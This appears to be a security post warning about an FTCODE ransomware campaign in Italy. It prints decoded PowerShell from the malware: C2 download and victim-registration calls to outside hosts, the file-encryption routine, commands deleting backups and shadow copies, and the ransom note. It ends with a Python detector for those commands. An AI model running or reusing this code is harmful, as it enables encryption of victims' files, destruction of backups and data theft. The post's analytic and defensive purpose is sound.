Caution! In recent days, especially in Italy, a ransomware campaign has been active, delivered through certified e-mail.
Stay away from these domains:
PowerShell file analysis:
The malware downloads a slightly obfuscated PowerShell file; we make a decoded copy of it available for research purposes.
https://www.cert-pa.it/notizie/campagna-ransomware-ftcode-veicolata-in-italia/
# Download of the second-stage PowerShell file, saved under a random file name
$zxbvvjt.DownloadString("http://home.goteamrob.com/?need=6ff4040&vid=dpec1&") | out-file $RndNum;
# Victim registration: version, campaign id, GUID and PowerShell version are posted to the C2
$gxggaiud = $zxbvvjt.UploadString( "http://connect.simplebutmatters.com/", ("ver=$version&vid=dpec1&guid=$guid&psver="+( ( (Get-Host).Version ).Major )+"&" + $data) );
# Encryption function: AES (RijndaelManaged) in CBC mode with a static salt and a static IV
function encrypt($content, $passwordString){
    $salt="BXCODE hack your system";
    $IVString="BXCODE INIT";
    $Rijndael = new-Object System.Security.Cryptography.RijndaelManaged;
    $password = [Text.Encoding]::UTF8.GetBytes($passwordString);
    $salt = [Text.Encoding]::UTF8.GetBytes($salt);
    # PBKDF1-style derivation (PasswordDeriveBytes, SHA1, 5 iterations) of a 256-bit key
    $Rijndael.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $password, $salt, "SHA1", 5).GetBytes(32);
    # The IV is the first 16 bytes of SHA1("BXCODE INIT"), so it is identical for every file
    $Rijndael.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($IVString) )[0..15];
    $Rijndael.Padding="Zeros";
    $Rijndael.Mode="CBC";
    $ecnryptor = $Rijndael.CreateEncryptor();
    $ibifxufvsi = new-Object IO.MemoryStream;
    $yfwfivehah = new-Object Security.Cryptography.CryptoStream $ibifxufvsi,$ecnryptor,"Write";
    $yfwfivehah.Write($content, 0,$content.Length);
    $yfwfivehah.Close();
    $ibifxufvsi.Close();
    $Rijndael.Clear();
    return $ibifxufvsi.ToArray();
}
# Disable Windows recovery, then delete backups, the backup catalog and all shadow copies
Exec('bcdedit /set tgsbhtzwci bootstatuspolicy ignoreallfailures');
Exec('bcdedit /set tgsbhtzwci recoveryenabled no');
Exec('wbadmin delete catalog -quiet');
Exec('wbadmin delete systemstatebackup');
Exec('wbadmin delete backup');
Exec('vssadmin delete shadows /all /quiet');
# Ransom note (HTML) shown to the victim
$message = "<h1>All your files was encrypted!</h1>
<h2 style='color:red'><b>Yes, You can Decrypt Files Encrypted!!!</b> our price 500 USD</h2>
<p>Your personal ID: <b>$guid</b></p>
<p>1. Download Tor browser - <a href='https://www.torproject.org/download/'>https://www.torproject.org/download/</a></p>
<p>2. Install Tor browser</p>
<p>3. Open Tor Browser</p>
<p>4. Open link in TOR browser: <b>http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=$guid</b></p>
<p>5. Follow the instructions on this page</p>
<h2>***** Warning*****</h2>
<p>Do not rename files</p>
<p>Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them)</p>
<p>As evidence, we can for free back one file</p>
<p>Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.</p>
";
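The recovery-disabling and backup-deletion sequence above (bcdedit, wbadmin, vssadmin) is the most reliably detectable stage of this script. The following is an added detection example, not code from the post or from the malware; the log format (timestamp|host|parent|command line) and the log lines are constructed, and the threshold and time window are assumptions.

```python
"""Flag hosts where several backup-destruction commands run in a short window."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each pattern is matched against the command line of a newly created process.
INDICATORS = {
    "bcdedit_recovery_off": re.compile(r"bcdedit.*recoveryenabled\s+no", re.I),
    "bcdedit_ignore_failures": re.compile(r"bcdedit.*bootstatuspolicy\s+ignoreallfailures", re.I),
    "wbadmin_delete": re.compile(r"wbadmin\s+delete\s+(catalog|systemstatebackup|backup)", re.I),
    "vssadmin_delete_shadows": re.compile(r"vssadmin\s+delete\s+shadows", re.I),
}

# Constructed sample log: "timestamp|host|parent process|command line".
# WS01 mirrors the script's sequence; WS02 and WS03 are benign admin activity.
SAMPLE_LOG = """\
2019-10-02T10:00:01|WS01|powershell.exe|bcdedit /set {default} bootstatuspolicy ignoreallfailures
2019-10-02T10:00:02|WS01|powershell.exe|bcdedit /set {default} recoveryenabled no
2019-10-02T10:00:03|WS01|powershell.exe|wbadmin delete catalog -quiet
2019-10-02T10:00:04|WS01|powershell.exe|vssadmin delete shadows /all /quiet
2019-10-02T11:30:00|WS02|explorer.exe|vssadmin list shadows
2019-10-02T12:00:00|WS03|mmc.exe|wbadmin delete backup -keepVersions:3
"""

def parse_line(line):
    ts, host, parent, cmd = line.split("|", 3)
    return datetime.fromisoformat(ts), host, parent, cmd

def detect(log_text, window=timedelta(minutes=5), min_hits=2):
    """Return {host: sorted indicator names} for every host on which at least
    min_hits distinct indicators fired within `window` of each other.
    A single wbadmin call (WS03) stays below the threshold; the chained
    sequence (WS01) does not."""
    hits = defaultdict(list)  # host -> [(time, indicator name)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, _parent, cmd = parse_line(line)
        for name, pattern in INDICATORS.items():
            if pattern.search(cmd):
                hits[host].append((ts, name))
    alerts = {}
    for host, events in hits.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            names = {n for t, n in events[i:] if t - t0 <= window}
            if len(names) >= min_hits:
                alerts[host] = sorted(names)
                break
    return alerts
```

In a real deployment the same logic runs over Sysmon event ID 1 or Security event 4688 command lines; the parent process field is kept so that a PowerShell parent can be used as an additional scoring signal.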
Hope this helps!
.glitchlist crew